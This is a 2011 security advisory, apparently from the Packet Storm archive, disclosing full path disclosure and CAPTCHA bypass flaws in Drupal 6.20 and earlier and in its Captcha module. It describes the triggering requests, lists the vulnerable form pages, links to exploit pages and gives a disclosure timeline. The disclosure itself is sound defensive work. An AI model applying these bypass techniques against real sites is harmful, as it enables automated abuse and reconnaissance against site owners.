what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Drupal Broken Anti-Automation / Path Disclosure

Drupal Broken Anti-Automation / Path Disclosure
Posted Feb 16, 2011
Authored by MustLive

Drupal versions 6.20 and below suffer from broken anti-automation and path disclosure vulnerabilities.

tags | advisory, vulnerability
SHA-256 | 998d6854d0553d84a23f01ebfab42858ac12d515cef3a3c74af722f5b84febca

Drupal Broken Anti-Automation / Path Disclosure

Change Mirror Download
Hello list!

I want to warn you about Full path disclosure and Insufficient
Anti-automation vulnerabilities in Drupal.

-------------------------
Affected products:
-------------------------

Vulnerable are Drupal 6.20 and previous versions.

Vulnerable versions of Captcha module are before 6.x-2.3 and 7.x-1.0.

----------
Details:
----------

Full path disclosure (WASC-13):

At POST request to the page with form with using of Cyrillic char in
parameter op, the error message is showing, which consists the full path on
the system.

Vulnerabilities exist at pages: http://site/user/, http://site/user/1/edit,
http://site/user/password, http://site/user/register, http://site/contact,
http://site/user/1/contact. Other pages which have forms also can be
vulnerable.

Exploit:

http://websecurity.com.ua/uploads/2011/Drupal%20Full%20path%20disclosure.html

As noted Drupal developers, these vulnerabilities appear due to turned on
debugging option in administrator panel. So for preventing of these and
other FPD at the site it's needed to turn off this option.

Insufficient Anti-automation (WASC-21):

In different forms in Drupal the vulnerable captcha is using. Drupal's
Captcha module is vulnerable itself, so all captcha-plugins can be
vulnerable. For bypassing of captcha it's needed to use correct value of
captcha_sid and the same value of captcha_response. This method of captcha
bypass is described in my project Month of Bugs in Captchas
(http://websecurity.com.ua/1498/). Attack is possible while this captcha_sid
value is active.

Vulnerabilities exist on pages with forms: http://site/contact,
http://site/user/1/contact, http://site/user/password and
http://site/user/register. Other forms where captcha is using also will be
vulnerable.

Taking into account that Captcha module for Drupal is third party module,
then Insufficient Anti-automation vulnerability exists as in Captcha module
(captcha bypass), as in Drupal itself (lack of captcha). In result we have
"forever vulnerable" condition, when default Drupal installation is
vulnerable to IAA and Captcha module is also vulnerable to IAA (but Captcha
module was already fixed in 2010, so it's recommended to update it to the
latest version).

Exploit:

http://websecurity.com.ua/uploads/2011/Drupal%20CAPTCHA%20bypass.html

------------
Timeline:
------------

2010.12.10 - announced at my site.
2010.12.11 - informed developers.
2010.12.11 - response from Drupal security team.
2010.12.12 - I drew attention of Drupal security team, that IAA holes
existed not only in Captcha module, but in Drupal itself (so it concerned
Drupal too).
2011.02.15 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4749/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close